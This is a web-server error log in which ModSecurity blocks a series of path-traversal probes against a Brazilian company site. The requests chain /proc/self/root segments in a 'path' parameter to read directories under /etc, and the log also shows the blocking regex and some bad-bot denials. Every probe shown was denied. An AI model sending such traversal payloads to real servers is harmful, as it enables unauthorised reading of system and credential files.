[Wed Mar 18 10:48:09.022867 2026] [:error] [pid 11816:tid 140411590858496] [client 74.7.243.128:37080] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtGew_le52K8_3pV3gOgAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:10.397184 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:51560] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtGtY0UrI5A3LftIyo-AAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:14.463627 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:51566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtHuyqAr6etmhZHNrAzAAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:16.811794 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.128:51576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtINY0UrI5A3LftIyo_wAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:18.828433 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.243.128:51584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtIuw_le52K8_3pV3gRAAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:21.174993 2026] [:error] [pid 17653:tid 140411649607424] [client 74.7.243.128:55576] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtJcdf6f5d65gmYZTVsgAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:26.771533 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:55590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtKgkwaGbbGflqUZARFQAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:28.401385 2026] [:error] [pid 17653:tid 140411548894976] [client 74.7.243.128:55600] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtLMdf6f5d65gmYZTVuwAAAtc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:29.722395 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.243.128:47108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtLUzinOy1jxa1j4cVyQAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:31.135339 2026] [:error] [pid 31803:tid 140411632822016] [client 74.7.243.128:47120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtL-yqAr6etmhZHNrA5AAAAE0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:32.539664 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:47130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtMOyqAr6etmhZHNrA5gAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:36.104522 2026] [:error] [pid 15826:tid 140411565680384] [client 74.7.243.128:47140] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtM-oXxyEfFpUF8f9t9AAAAVU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:36.130547 2026] [:error] [pid 15051:tid 140411548894976] [client 74.7.228.61:52496] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqtMymAPhZkrhU8w4ltCgAAAJc"]
[Wed Mar 18 10:48:37.861904 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:47152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtNeoXxyEfFpUF8f9t-AAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:39.525814 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.243.128:53596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtN-w_le52K8_3pV3gXQAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:41.011510 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:53598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtOeyqAr6etmhZHNrA8AAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:42.382962 2026] [:error] [pid 19507:tid 140411716749056] [client 74.7.244.43:52138] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqtOtY0UrI5A3LftIypIwAAAYM"]
[Wed Mar 18 10:48:42.607014 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.243.128:53610] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtOuw_le52K8_3pV3gYAAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:44.487035 2026] [:error] [pid 29882:tid 140411716749056] [client 74.7.243.128:53614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtPEzinOy1jxa1j4cV7QAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:47.180396 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:53624] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtPew_le52K8_3pV3gZAAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:47.692344 2026] [mime_magic:error] [pid 30077:tid 140411607643904] (70014)End of file found: [client 57.141.18.9:35742] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:48:49.092116 2026] [:error] [pid 26799:tid 140411674785536] [client 74.7.243.128:53640] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtQda6ubjKNq_cu4aapAAAA0g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:48:50.083190 2026] [:error] [pid 29882:tid 140411641214720] [client 216.73.216.191:4422] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/etc/iproute2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqtQkzinOy1jxa1j4cV9wAAAQw"]
[Wed Mar 18 10:48:50.570803 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.243.128:34234] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 